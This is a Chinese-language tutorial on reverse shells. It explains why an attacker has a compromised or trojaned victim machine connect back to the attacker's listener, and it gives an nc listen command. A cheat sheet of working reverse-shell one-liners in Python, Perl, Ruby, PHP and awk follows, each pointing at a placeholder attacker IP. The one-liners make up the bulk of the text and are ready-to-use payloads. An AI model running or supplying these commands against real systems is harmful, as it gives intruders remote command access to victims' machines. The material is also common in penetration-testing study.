反弹shell

什么是反弹shell

　    反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell？

         通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
        举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢？
        有如下情况：
        1.    某客户机中了你的网马，但是它在局域网内，你直接连接不了。
         2.目标机器的ip动态改变，你不能持续控制。
         3.由于防火墙等限制，对方机器只能发送请求，不能接收请求。
        4.对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。
那么反弹就很好理解了，攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。

常见脚本反弹

        以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，port为端口，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述。

打开端口监听命令：nc -lvvp port  //攻击机上执行，port为你想监听的端口，通常是不常用的。

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

perl

perl -e '
use Socket;
$i="x.x.x.x";
$p=port;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php

php -r '$sock=fsockopen("x.x.x.x",port);exec("/bin/bash -i <&3 >&3 2>&3");'

awk

awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/port";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'